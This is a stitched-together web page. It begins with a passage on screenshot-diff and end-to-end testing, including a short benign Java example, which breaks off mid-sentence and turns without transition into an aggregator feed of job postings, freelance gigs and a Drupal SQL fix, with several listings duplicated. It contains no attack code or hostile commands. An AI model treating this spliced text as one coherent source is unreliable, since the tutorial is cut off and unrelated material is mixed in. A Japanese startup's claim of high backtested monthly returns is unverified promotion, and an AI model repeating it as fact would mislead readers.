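The core mechanism behind these screenshot-diff tools can be sketched in a few lines of plain Java. This is illustrative code only, not how Galen or jlineup are actually implemented: it counts the pixels that differ between two same-sized screenshots and flags the page when the ratio exceeds the threshold.

```java
import java.awt.image.BufferedImage;

public class ScreenshotDiff {

    // Fraction of pixels that differ between two screenshots.
    public static double diffRatio(BufferedImage before, BufferedImage after) {
        if (before.getWidth() != after.getWidth()
                || before.getHeight() != after.getHeight()) {
            return 1.0; // page dimensions changed: treat as completely different
        }
        long differing = 0;
        long total = (long) before.getWidth() * before.getHeight();
        for (int y = 0; y < before.getHeight(); y++) {
            for (int x = 0; x < before.getWidth(); x++) {
                if (before.getRGB(x, y) != after.getRGB(x, y)) {
                    differing++;
                }
            }
        }
        return (double) differing / total;
    }

    // Alert only when the difference exceeds the configured threshold.
    public static boolean layoutBroken(BufferedImage before, BufferedImage after,
                                       double threshold) {
        return diffRatio(before, after) > threshold;
    }

    public static void main(String[] args) {
        BufferedImage a = new BufferedImage(10, 10, BufferedImage.TYPE_INT_RGB);
        BufferedImage b = new BufferedImage(10, 10, BufferedImage.TYPE_INT_RGB);
        b.setRGB(0, 0, 0xFFFFFF); // change a single pixel (1% of the image)
        System.out.println(diffRatio(a, b));          // 0.01
        System.out.println(layoutBroken(a, b, 0.05)); // false
    }
}
```

Real tools add tolerance for anti-aliasing and highlight the differing regions, but a threshold comparison like this is the essential idea.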

Galen is one of these tools. Even rolling your own, if you have special requirements, isn't too hard. Some teams I've worked with built lineup and its Java-based sibling jlineup to achieve something similar. As mentioned before, both tools take a Selenium-based approach.

Once you want to test usability or check whether something "looks right", you leave the realm of automated testing. This is the area of exploratory testing and usability testing (which can be as simple as hallway testing). Show your product to your users and see whether they like using it, and which features confuse or annoy them.

End-to-end tests

Testing a deployed application via its user interface is the most end-to-end way you can test it. The webdriver-driven UI tests described above are a good example of end-to-end tests.

(End-to-end tests exercise your entire, fully integrated system)

End-to-end tests (also called broad-stack tests) give you the greatest confidence that your software is working. Selenium and the WebDriver protocol let you automate tests against a deployed service by driving a (headless) browser that clicks, enters data, and checks the state of the user interface. You can use Selenium directly or rely on a Selenium-based tool like Nightwatch.

End-to-end tests come with their own kind of problems. They are notoriously flaky, often failing for unexpected reasons, and their failure messages rarely point at the real cause. The more sophisticated your user interface, the more brittle the tests tend to be. Browser quirks, timing issues, element rendering, unexpected popup dialogs... this list is only the beginning, and it has already cost me many frustrating hours of debugging.

In a microservices world there's also the big question of who is responsible for writing these tests. Since they span multiple services (your entire system), end-to-end tests are not the responsibility of any single team.

If you have a centralised quality assurance team, letting them write the end-to-end tests might look like a good fit. Then again, a centralised QA team is a big anti-pattern that shouldn't have a place in a DevOps world, where your teams are meant to be truly cross-functional. There's no easy answer to who should own end-to-end tests. Maybe a community of practice or a quality guild in your organisation can take care of them. The right answer depends heavily on your organisation.

Furthermore, end-to-end tests require a lot of maintenance and run pretty slowly. Unless you have only a couple of microservices, you won't even be able to run end-to-end tests locally, because that would mean starting all your services. Good luck spinning up hundreds of applications on your machine without blowing your RAM.

Because of their high maintenance cost, you should aim to reduce the number of end-to-end tests to a bare minimum.

Think about the high-value interactions users will have with your application. Define the user journeys that deliver your product's core value, and then translate these journeys

          Codeigniter customise Income and Expense Web app      Cache   Translate Page      
I need an experienced PHP codeigniter developer with a good understanding of Microsoft Excel functionality to build a web data entry and processing application for Income and Expense Management Details... (Budget: $30 - $250 USD, Jobs: Codeigniter, HTML, MySQL, PHP)
          Codeigniter customise Income and Expense Web app      Cache   Translate Page      
I need an experienced PHP codeigniter developer with a good understanding of Microsoft Excel functionality to build a web data entry and processing application for Income and Expense Management Details... (Budget: $30 - $250 USD, Jobs: Codeigniter, HTML, MySQL, PHP)
          Desarrollador programador Wordpress Woocommerce Senior      Cache   Translate Page      
Chas Consulting - Barracas, Buenos Aires - Trabajo en equipo, reporte de horas, avances, desarrollo y mantención de portales Buscamos programadores/as desarrolladores/as con amplios conocimientos de Laravel, PHP, Wordpress, Woocommerce, css, jquery, MySQL. Responsable de generar páginas webs de diseño actual y amplia...
          SOLVED: how to 'UNpromote all" to front page      Cache   Translate Page      

I've migrated a bunch of content into a Drupal 8 install. Most everything has been 'promoted to front page.'

I need to un-promote everything. I have the option to 'bulk update fields' but that field is not an option. I could do the edit via MySQL, but I'm struggling to find where this is in the database before doing a update query. I imagine something like "UPDATE node SET promote = 0" but I'm not sure I'm in the right place, as that doesn't work.

UPDATE: scratch that.. figured it out. I was close. I had to keep digging and found the table : UPDATE node_field_data SET promote = 0

Drupal version: 

          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Add bouqet acces to our iptv addon      Cache   Translate Page      
Hello, We are using IPTV in kodi, we use amember as a membership program. we have added a test bouqet for 3 days in our iptv plugin. im able to see the bouqet, but the new added ID needs to have premmission... (Budget: €8 - €30 EUR, Jobs: Linux, MySQL, PHP, Software Architecture)
          (USA-CA-San Diego) #95903 System Administrator and Project Coordinator      Cache   Translate Page      
#95903 System Administrator and Project Coordinator Filing Deadline: Tue 10/23/2018 Apply Now UCSD Layoff from Career Appointment: Apply by 10/11/18 for consideration with preference for rehire. All layoff applicants should contact their Employment Advisor. Special Selection Applicants: Apply by 10/23/18. Eligible Special Selection clients should contact their Disability Counselor for assistance. DESCRIPTION The UCSD School of Medicine is involved in development of several bioinformatic resources for network analysis that are widely used by the biological research community. The best known is Cytoscape (http://www.cytoscape.org), a collaborative open-source software project. Cytoscape is a leading workstation-based platform for visualizing and processing complex networks. It is widely used with approximately 17,000 downloads per month. NDEx, the Network Data Exchange (http://ndexbio.org), is another major project, a public web resource for sharing, storing, accessing, and publishing biological knowledge as computable networks. The System Administrator and Project Coordinator (SAPC) will manage, maintain and extend the computing infrastructure, both hardware and software, and they will support the users of that infrastructure. The System Administrator and Project Coordinator (SAPC) will work with the software development team to deploy and administrate cloud hosted websites and services, including usage analysis and reporting. Finally, the SAPC will coordinate the software release process for the web and desktop products of the software development team, including the management of issue tracking and user bug reporting. Lab infrastructure system administration: The SAPC will administrate scientific computing infrastructure that includes the secure compute clusters, a VM cluster, a GPU server, lab workstations and compute servers, and multiple storage servers. Most of the systems are housed at the San Diego Supercomputing Center (SDSC). 
Administration will include maintenance of the rack-mounted systems at SDSC, diagnosing hardware problems, replacing components and installing new systems. The SAPC will work with stakeholders to design hardware and software solutions as the infrastructure evolves to meet new demands. They will manage the purchasing process and interface with vendors for warranty support. They will monitor alerts and performance metrics and will plan and manage data and image backup. They will manage the user authentication system, gateway computers, the firewall, VPN, samba server, IP allocation and Hostmaint. They will control the configuration of all systems, using tools such as Puppet. The SAPC will also maintain the documentation for the systems, including hardware configuration. Lab user support: The SAPC will install and maintain user workstations and other computers onsite. They will control the software configuration of these systems, including the installation of commonly used packages. They will diagnose problems and install and replace hardware. They will assist lab members in the configuration of personal machines for interfacing to the lab infrastructure. They will maintain and extend user documentation for lab computing. They will assist in the IT issues encountered when installing or maintaining scientific instruments in the wet lab, including interfacing with vendors for support and managing regular backups of attached computers. The SAPC will manage user accounts and commercial software used in the lab. They will monitor the usage of the lab computing infrastructure and assist users in using those systems, answering questions, fielding bug reports and otherwise responding to requests. Cloud website and service system administration: The SAPC will administrate websites and web services hosted on cloud providers including AWS and Google. They will track usage of these systems, using both standard tools and custom logging and reporting systems. 
They will prepare periodic reports of usage, working with the software development team to plan and implement appropriate metrics. They will perform backups, respond to outages, and work with the software development team to make the deployed systems robust and secure. Coordination of software release process and issue tracking: The SAPC will work with the software development team to maintain and administrate internal issue tracking systems and end-user bug and issue reporting systems. They will manage aspects of the software release process, including maintaining schedules, organizing and tracking testing, and performing final deployment to the web. MINIMUM QUALIFICATIONS + Bachelor's degree in Computer Science or Computer Engineering or equivalent combination of education and experience + Two (2) or more years of system/database administration experience. + General knowledge of several areas of IT. + Demonstrated ability to install software and troubleshoot and repair moderately complex problems with computing devices, peripherals and software. Understanding of system performance monitoring and actions that can be taken to improve or correct performance. Basic knowledge of incident response procedures. Demonstrated ability to follow software specifications Including windows and OS/X operating systems. + Demonstrated experience with database administration. Including SQL databases such as MySQL, Postgres + Demonstrated knowledge of computer security tools, best practices and policies. Demonstrated skills applying security controls to computer software and hardware. Examples: user authentication systems, gateway computers, firewalls, VPNs + Demonstrated testing and test planning skills. + Ability to write technical documentation in a clear and concise manner. + Demonstrated understanding of how system management actions affect users and dependent / related functions. 
+ Interpersonal skills sufficient to work with both technical and non-technical personnel at various levels in the organization. Ability to elicit and communicate technical and non-technical information in a clear and concise manner. + Self-motivated and works independently and as part of a team. Demonstrates problem-solving skills. Able to learn effectively and meet deadlines. + Experience with UNIX systems administration, including installation, backups, upgrades and maintenance. Also including experience administrating clusters + Experience using GitHub or other version control software in multi-user projects, especially for periodically released software. + Experience maintaining medium scale cluster hardware, small numbers of rack-mounted systems. Including diagnosis of hardware problems, replacing components and installation of new hardware. + Experience deploying and maintaining basic websites and/or web services via apache or other webservers or hosted on cloud providers such as AWS and Google. + Experience in supporting end users in both software and / or hardware issues. + Experience using issue tracking systems such as Jira, Redmine, Asana PREFERRED QUALIFICATIONS + Experience in purchasing of hardware and software, interfacing with vendors, managing warranties and vendor support. + Experience with VM clusters (including software such as VMWare) and GPU servers + Experience working with stakeholders to design hardware and software solutions in computing infrastructure + Experience working with large RAID systems or other redundant or high performance cluster storage hardware and software. + Experience working with GPFS, and other cluster storage software. + Experience with remote monitoring software like Ganglia, Nagios, etc. + Experience with Puppet or other administration automation software + Experienced in webserver configuration, Docker deployment, scalable clusters, Solr or Lucene search engine databases. 
+ Experience with logging and usage tracking systems for webservers, websites, including the analysis of usage and the preparation of relevant reports. + Knowledge of bioinformatics software packages and applications + Experience managing or participating in software releases. + Knowledge of business processes and procedures. Knowledge of the design, development and application of technology and systems to meet business needs. + Knowledge relating to the design and development of software. Basic knowledge of secure software development. + Knowledge of data management systems, practices and standards. SPECIAL CONDITIONS + Employment is subject to a criminal background check. Apply Now UC San Diego Health is the only academic health system in the San Diego region, providing leading-edge care in patient care, biomedical research, education, and community service. Our facilities include two university hospitals, a National Cancer Institute-designated Comprehensive Cancer Center, Shiley Eye Institute, Sulpizio Cardiovascular Center, and several outpatient clinics. UC San Diego Medical Center in Hillcrest is a designated Level I Trauma Center and has the only Burn Center in the county. We invite you to join our dynamic team! Applications/Resumes are accepted for current job openings only. For full consideration on any job, applications must be received prior to the initial closing date. If a job has an extended deadline, applications/resumes will be considered during the extension period; however, a job may be filled before the extended date is reached. UC San Diego Health is an Equal Opportunity/Affirmative Action Employer. All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, age, protected veteran status, gender identity or sexual orientation. 
For the complete University of California nondiscrimination and affirmative action policy see: http://www-hr.ucsd.edu/saa/nondiscr.html UC San Diego is a smoke and tobacco free environment. Please visit smokefree.ucsd.edu for more information. Payroll Title: INFO SYS ANL 2 Department: MEDICINE/Genetics Salary Range Commensurate with Experience Worksite: La Jolla Appointment Type: Career Appointment Percent: 100% Union: Uncovered Total Openings: 1 Work Schedule: Days, 8 hrs/day, Mon-Fri As a federally-funded institution, UC San Diego Health maintains a marijuana and drug free campus. New employees are subject to drug screening.
          (USA-CA-Livermore) Livermore Computing Accounts Specialist      Cache   Translate Page      
Livermore Computing Accounts Specialist Location: Livermore, CA Category: Technicians/IT Organization: Computation Posting Requirement: External w/ US Citizenship Job ID: 104342 Job Code: Computer Support Technologist (525.2) / Sr Comp Support Technologist (525.3) Date Posted: October 09 2018 Share this Job Apply Now Apply For This Job Science and Technology on a Mission! For more than 60 years, the Lawrence Livermore National Laboratory (LLNL) has applied science and technology to make the world a safer place. We have an opening for a Livermore Computing (LC) Accounts Specialist to provide general tier 1 technical support for approximately 3,500 users of the LC supercomputing systems. You will be responsible for providing support by phone, in person or through email to answer and resolve requests for all LC account services provided by the LC Hotline. This position is in the Customer Service Group within the Livermore Computing Division of the Computation Directorate. This position will be filled at either the 525.2 or 525.3 level depending on your qualifications. Additional job responsibilities (outlined below) will be assigned if you are selected at the higher level. Essential Duties - Support the administration of LC user accounts, OTP tokens, banks, UNIX groups, and shared directories, while ensuring users are equipped to efficiently and effectively use computers. - Provide excellent customer service and support a diverse user community to answer and resolve customer calls and requests, document all service calls and solutions, and research and troubleshoot LC account issues. - Provide general technical support to solve technical problems of moderate complexity within the LC user community in support of all of the account services - Document and maintain LC Accounts Specialists’ email templates, processes, and procedures. - Maintain appropriate technology, computer security, and safety training. 
- Process account and UNIX group creations and deletions via the LC Identity Management tool. - Perform other duties as assigned. In Addition at the 525.3 Level - Provide advanced technical assistance to the LC user community by answering calls, emails, and self service requests from users. - Collaborate on implementation of improvements to existing procedures and tools. - Develop scripts to automate LC Accounts Specialists’ support processes. Qualifications - Associate’s degree in a Computer or Engineering related field or the equivalent combination of education, technical training and related experience. - Experience working with customers, addressing issues, and managing customer requests on the phone, via email and/or in person. - General working knowledge of the Linux, Windows and Macintosh Operating systems. - Experience resolving moderately complex problems with a focus on details to ensure follow-through to assure problems are resolved. - Experience writing technical solutions and commercial knowledgebase articles. - Ability to develop and follow detailed policies and procedures. - Experience and knowledge of the skills needed for a customer support role to include a focus on listening, rapport-building, good written and verbal communication skills with the ability to communicate with individuals with all levels of technical and non-technical skill sets. Display a friendly and approachable nature and the ability to show courtesy and patience under stress. - Ability to work with other members of the LC division, LC Computer Coordinators and PI’s. In Addition at the 525.3 Level - Ability to evaluate existing operational procedures and develop and implement process improvement changes to improve LC Hotline operations. - Strong analytical and troubleshooting skills, attention to detail, consistent resolution of problems. 
- Advanced written and verbal communication skills with the ability to communicate with individuals with all levels of technical and non-technical skill sets. Desired Qualifications - Advanced knowledge of the Linux operating system, Microsoft Office Suite and Service Now incident management system - Experience working at a service desk. - Experience using mysql or similar database. Pre-Employment Drug Test: External applicant(s) selected for this position will be required to pass a post-offer, pre-employment drug test. Security Clearance: This position requires a Department of Energy (DOE) Q-level clearance. If you are selected, we will initiate a Federal background investigation to determine if you meet eligibility requirements for access to classified information or matter. In addition, all L or Q cleared employees are subject to random drug testing. Q-level clearance requires U.S. citizenship. If you hold multiple citizenships (U.S. and another country), you may be required to renounce your non-U.S. citizenship before a DOE L or Q clearance will be processed/granted. Note: This is a Career Indefinite position. Lab employees and external candidates may be considered for this position. About Us Lawrence Livermore National Laboratory (LLNL), located in the San Francisco Bay Area (East Bay), is a premier applied science laboratory that is part of the National Nuclear Security Administration (NNSA) within the Department of Energy (DOE). LLNL's mission is strengthening national security by developing and applying cutting-edge science, technology, and engineering that respond with vision, quality, integrity, and technical excellence to scientific issues of national importance. The Laboratory has a current annual budget of about $1.8 billion, employing approximately 6,500 employees. LLNL is an affirmative action/ equal opportunity employer. 
All qualified applicants will receive consideration for employment without regard to race, color, religion, marital status, national origin, ancestry, sex, sexual orientation, gender identity, disability, medical condition, protected veteran status, age, citizenship, or any other characteristic protected by law.
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Tableau Developer      Cache   Translate Page      
CA-Redwood City, Redwood City, California Skills : Tableau, SSRS development, Data visualization, SQL Server, Redshift, Athena, MySQL and Analytics Description : Required Qualifications: • 5-7 years of development experience in Tableau • 3-4 years of development experience in Tableau and SSRS development. • 2+ years of experience with BI UX design. • 2+ years of experience with Analytics. • Experience with data vi
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Hotel rereservation system      Cache   Translate Page      
I want to make a website of hotel reservation system using PHP, MYSQL, HTML, JAVASCRIPT. (Budget: ₹600 - ₹1500 INR, Jobs: HTML, Javascript, MySQL, PHP)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          (USA-AL-Huntsville) Software Engineer (MSIC)      Cache   Translate Page      
Software Engineer (MSIC) Tracking Code 3204-987 Job Description Founded in 1980, COLSA Corporation’s team of engineers, analysts and professionals across the US provide government and commercial customers with the latest and most sophisticated engineering, programmatic, and information technology services. Centered at the core of its values, COLSA knows its people are its most valuable resource. In addition to receiving a competitive compensation package, our employees enjoy offerings such as flexible work schedules, paid time off, benefits that begin on the date of hire, recognition programs, tuition and certification assistance, and immediate vesting in our matching 401(k) plan. Our WE CARE Wellness program provides support and initiatives to empower employees and their families to live healthy, balanced lives and our Association of COLSA Employees (ACE) provides a fun way for employees and their families to come together in times of both celebration and need. We invite you to connect your talents with opportunity, and be a part of our “Family of Professionals,” in supporting cutting-edge initiatives! General SummaryDesigns, develops, troubleshoots and analyzes software programs for computer based systems.Principal Duties and Responsibilities (*Essential functions) * Investigate and use new technologies to revitalize existing data systems.* Designs and develops software programs ** Analyzes user''s software program needs and assists in troubleshooting ** Design and develops software using basic compilers, assemblers, utility programs and operating systems ** May provide input for documentation of new or existing programs * Assist in monitoring data system behavior and web application(s) performance/function, including server configuration. * Design and develop software using basic compilers, assemblers, utility programs and operating systems. * Integrate and test software components and tools. 
* Develop new utility tools and existing tool enhancements as identified. * Use expertise in XML data handling and processing and also relational database usage. * Interact with data customers, helping to ensure the locating and retrieving of data is successful. * Interact with government agencies as required to facilitate data contributions into data system. Required Experience Required Qualifications * Bachelor's degree in computer science, information systems, engineering, business, or other related field or equivalent experience. * Two years applicable software design engineering experience * Working knowledge of current operating systems and programming languages * Active Top Secret clearance with immediate eligibility for DIA-SCI access. * Ability to pass a Counter Intelligence (CI) Polygraph within 60 days of hire. * Ability to obtain and maintain Security + CE within 6 months of hire. Preferred Qualifications * Experience with XML, Perl, PHP, JavaScript, XML, XSLT, Java, MySQL (relational databases) * Experience working in a classified computing environment * Active CompTIA Security+ CE * Currently active TS/SCI * Current Counter Intelligence (CI) Polygraph Applicant selected will be subject to a government security investigation and must meet eligibility requirements for access to classified information. COLSA Corporation is an Equal Opportunity Employer, Minorities/Females/Veterans/Disabled. All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, sexual orientation, gender identity, or national origin. Job Location Huntsville, Alabama, United States Position Type Full-Time/Regular
          本気で自分を成長させたいエンジニアインターン大募集! by 株式会社CoinOtaku      Cache   Translate Page      
コインオタクでは、仮想通貨に関する定量データを収集・解析し、仮想通貨毎に評価付け・価格予測をするサービスを提供しております。 機械学習による市場予測や通貨の将来性に対する評価は、ゴールドマンサックスなどの証券会社や銀行、Googleなどのテックジャイアントが精力的に開発を進めている分野であり、その開発を仮想通貨領域において行なっているのが弊社です。 現状の成果としては、数百種の仮想通貨に対して、 開発力、 性能、 市場からの評価、 コミュニティの活発さ、 マイニングの現状 将来的な実需、 などの観点から分析を行い、偏差値という形で評価を出し、有料コンテンツとして提供しております。 また、10種以上の取引所から価格情報を取得し機械学習させることでバックテストで月数10パーセントのリターンを出すアルゴリズムの作成をしております。 仮想通貨に対して正当な評価を下すことが極めて難しい市場の中で、 ビッグデータを用いて仮想通貨市場を解明したい方、そしてそれを多くのユーザーに届けたい方、ぜひご応募ください! ▼業務で使用する技術・ツール ・基礎技術  ・機械学習  ・ウェブ ・使用言語  ・Python3  ・Javascript ・ライブラリ  ・Flask  ・Vue  ・Nuxt  ・Express ・インフラ  ・EC2  ・S3  ・RDS  ・Redis  ・MySQL ▼必須項目 ・Python/Javascriptいずれかでの開発経験 ▼推奨項目 ・AWSなどのインフラに関する知識 ・機械学習・統計に関する知識 ▼求める人物 ・仮想通貨に対する興味がある方 ・大胆にチャレンジし、多くの失敗から学べる方 ・チームのために、自ら考え、自ら動き、率先して成功のために行動できる方 ・オーナーシップを持って業務に励み、ベストを尽くすための努力を惜しまない方 ぜひ一緒に仮想通貨市場を解明し、市場に対して説得力のある答えを提供することで市場の発展を支えましょう!ご応募をお待ちしています! ーーーーーーーーーーーーーーーーーーーーーー コインオタクのお仕事に少しでも興味を持たれた方へ ーーーーーーーーーーーーーーーーーーーーーー コインオタクは、本気で【世界一の仮想通貨情報サービス】を目指しています。 この目的を共有し、それを本気で実現しようとしている学生たちで構成されています。 そして、結果も着実に出ています。 他の学生インターンとは異なり裁量権の重さ、達成感、充足感は段違いのものになっています。 少しでもこの目的を実現したい、その過程で様々なスキルセットを学び成長したいと思う部分があれば、ぜひ「話を聞きたい」ボタンを押してみてください。 長くなりましたが、ここまで読んでいただきありがとうございました。 メンバー一同、あなたからのご応募を心よりお待ちしています。
          Web engineers who want to build skills on greenfield work and do agile development! by 株式会社mofmof
■Background Our development service "Dev Team Rental" receives many requests along the lines of "we want to launch a new business, but an ordinary development shop can't handle it." As the business grows, we no longer have enough engineers to take on the demand, so we are stepping up our hiring of web engineers. ■The work You will handle monthly-fee contract development for "Dev Team Rental" 2.5 to 5 days a week. Despite the name, this is not on-site staffing — all development happens in our own office. Our development style is specialized for new businesses: we deliberately plan in short spans of three months or less, release a minimal product, and put weight on getting customer feedback as early as possible. In new-business development, exhaustive design documents and heavy management structures are counterproductive, so we strive to write code that is as maintainable and readable as possible, limit documentation to what is needed for development and communication, and avoid pointless paperwork. Our team building is based on Scrum: instead of committing to how much we can build in a fixed period, we continuously re-examine what to prioritize and what not to, which cuts out unreasonable, wasted work. We usually develop in small teams of two to six people including the client (product owner), hold a weekly meeting without fail, and place importance on discussing the details, purpose, and priority of each feature — so "who needs this and why" never becomes a black box, and you work close to the client and end users. ■Languages and frameworks - Ruby - Ruby on Rails - MySQL or Postgres - Heroku - Amazon Web Services We basically use the latest versions, and for projects under active development the policy is to always upgrade to the latest. On-premises infrastructure is inefficient, unmaintainable, and outdated, so we don't accept projects that can't use Heroku or AWS. ■Tools - GitHub - Pivotal Tracker - Slack - Circle CI - Wercker ■Services we build Details depend on the project, but all are web applications built with Ruby on Rails. Past examples: an event-matching service between new graduates and companies; an e-book sales platform; an e-commerce service; a cloud infrastructure configuration-management service; a trend-fashion media service; and more. ■Required skills and experience - Rails experience not required - Hands-on experience with a web application framework (Laravel, Struts, CakePHP, etc. also fine) - Availability at least 2.5 days a week - Professional work experience ■Nice to have - Hands-on Ruby on Rails experience (any length) - Scrum development experience - Machine learning ■How we work at mofmof - Remote-work day once a week (Tuesdays) - Free dress code and hairstyle - Shortened or shifted hours possible (with actual track record) - Side jobs OK - We encourage leaving on time! - Free massage twice a month
          Seeking VR / AR / web development engineers to thrive in Nagoya! by 株式会社 アイデアクラウド
We are hiring engineers for VR, AR, and web development! The work ranges widely, from web system development to VR and AR app development, and depending on the project may extend to interactive content development. At IDEACLOUD the work spans everything from Unity development to plain web coding, deep front-end work with JavaScript, back-end construction with PHP and databases, infrastructure building, and server maintenance. While we handle all of it, we won't dump everything on you: tasks and areas of responsibility are assigned appropriately based on aptitude and your own wishes. Sales, planning, and design are handled by directors and designers, so you can focus on sharpening your programming skills to the fullest. Depending on ability, you can also work on cutting-edge R&D or our own products, and in the future move up from programmer to project manager or other senior roles, or take a central position involved in running the company. 【Position】 Programmer 【We WANT you if…】 ✔You are interested in programming ✔You love programming ✔You want to grow into a director role 【Target】 People with practical experience (coding, web development, system development, app development, etc.) — experience in just one area is fine; you don't need to be able to do everything. 【Main duties】 - HTML coding (responsive) - CMS construction (B2B systems, etc.) - WordPress integration and customization - Database construction (MySQL/PostgreSQL) - VR and AR app development - Interactive content development 【Languages and development environment】 ■Languages used - HTML5 - CSS3 - PHP - JavaScript - C# - Swift - Java etc. (you don't need to master all of them) ■Environment and tools - Sublime Text - Illustrator - Unity - Xcode - Android Studio etc., depending on the area you take on
          (USA-VA-Chantilly) Software Application Engineer
Job Description What You’ll Get to Do: CACI is currently looking for outstanding IT candidates to join our TSA IT Management, Performance Analysis, and Collaborative Technologies (IMPACT) team in the National Capital Region (NCR) and throughout the United States. CACI will provide a variety of IT services through IMPACT including cyber security, identity and access management, risk management, cloud integration and engineering, field support services, service desk, application deployment and optimization, and operations center support services. CACI will support TSA in both classified and unclassified IT operational environments increasing availability and security for a variety of applications and systems. IMPACT services will integrate with the broader DHS mission and enhance existing Department-wide IT capabilities. More About the Role: + Sustainment of application systems and infrastructure and systems deployed to TSA’s production network + Support for applications transitioning into TSA’s Test environment + Daily, weekly, monthly preventative maintenance + Tier 3/4 break-fix support + Emergency release/update support + Interacting with network, security, database or other support teams as required to resolve break/fix issues + Capacity/utilization trend analysis + Coordinating backup / restoration of application systems and data + Updating Standard Operating Procedures as required + Updating break/fix / knowledge database as required + Configuration management and control of production application, systems, infrastructure and services + Researching and recommending future technologies for consideration and adoption + Identifying opportunities to improve application sustainability, security, and/or cost efficiency You’ll Bring These Qualifications: + Ability to obtain a DOD Security Clearance + Ability to obtain a DHS Entrance on Duty (EOD) + BA/BS or equivalent experience and minimum 5 years related work experience + Relevant DHS focused experience + Strong 
candidates will have a good understanding of standard software development lifecycles, including Agile and Waterfall, for one or more U.S. Federal Agencies or DoD. + Be well-versed in application development using .NET, Java, PHP, Microsoft SQL, MySQL or Oracle and Oracle Middleware + Experience working with design engineers or product development team test technical products and report problems or failures to improve or perfect the products + Experience developing and executing test plans, procedures, test cases, and test scripts for IT SOA development environment projects + Experience supervising test and evaluation technical effort + Experience performing typical tasks that include, but are not limited to, prototype development and first article testing, environmental testing, independent verification and validation, demonstration and validation, simulation and modeling, system safety, quality assurance, education and training, and physical testing of the product or system + Experience performing system, interface, deployment, and performance testing on a variety of systems, platforms, and environments + A background in providing customer support, operational support, and analysis of test results + Experience coordinating across multiple stakeholders of various technical backgrounds + Excellent oral and written communications + Experience using quality control and application testing tools + Experience in utilizing the COTS products identified such as the following: + Operating System: IBM AIX, Solaris OS, Red Hat Enterprise Linux, Microsoft Windows Server 2008 or later + Oracle: Oracle Application Server; Oracle Grid Infrastructure; Oracle Database; Oracle Clients; Oracle SQL Developer; WebLogic, + Data Loss Prevention: McAfee Agent; McAfee Host Intrusion Prevention; McAfee Policy Auditor; Policy Auditor Content Update; Policy Auditor Agent; SQL Server + COTS: Internet Explorer; Adobe Acrobat Reader X; ActivClient CAC; ActivCard Gold for CAC -“ PKI; ForgeRock 
Open AM Java EE Policy Agent; Tivoli Client, Veritas Volume Manager & Netbackup + Detail oriented + Flexible – The environment is highly dynamic. You will be expected to keep up with the changing environment while ensuring a high level of operational effectiveness + Team Player – This role is part of a much larger team What We Can Offer You: - We’ve been named a Best Place to Work by the Washington Post. - Our employees value the flexibility at CACI that allows them to balance quality work and their personal lives. - We offer competitive benefits and learning and development opportunities. - We are mission-oriented and ever vigilant in aligning our solutions with the nation’s highest priorities. - For over 55 years, the principles of CACI’s unique, character-based culture have been the driving force behind our success. TSAHP Job Location US-Chantilly-VA-VIRGINIA SUBURBAN CACI employs a diverse range of talent to create an environment that fuels innovation and fosters continuous improvement and success. At CACI, you will have the opportunity to make an immediate impact by providing information solutions and services in support of national security missions and government transformation for Intelligence, Defense, and Federal Civilian customers. CACI is proud to provide dynamic careers for employees worldwide. CACI is an Equal Opportunity Employer - Females/Minorities/Protected Veterans/Individuals with Disabilities.
          (USA-VA-Reston) Software Developer
Job Description CACI is looking for an experienced Software Developer to join our team to perform full lifecycle software development activities on a myriad of business systems and tools. You will maintain and enhance a system built on Java and MySQL technologies hosted in the cloud environment. You will confer with management and other development team members to prioritize needs, resolve conflicts, develop content criteria, or choose solutions. You will have the following: + Web designs that effectively address interoperability with other applications. + Writing interfaces to companion applications or databases. + Writing necessary code, scripts, and macros. + Experience developing with the JAVA based MVC framework Spring/Bootstrap. + Experience developing client-side JavaScript user interfaces using JQuery/Bootstrap, HTML, and CSS. + Experience designing and developing with MySQL RDBMS including proficiency with SQL. + Experience with Amazon Web Services (AWS) You will have one of the following: + 8 Years of job related experience and Associate degree + 4-7 Years of job related experience and Bachelor’s degree + 3 Years of job related experience and Master’s degree + 2 Years of job related experience and Doctorate It would be nice if you had: + Experience with tools such as Maximo and Sponsor’s help desk suite. + Experience programming with related technologies such as Java, C, C++, Perl. + Experience in web protocols and technologies – XML, HTML, HTTP, and System Design. 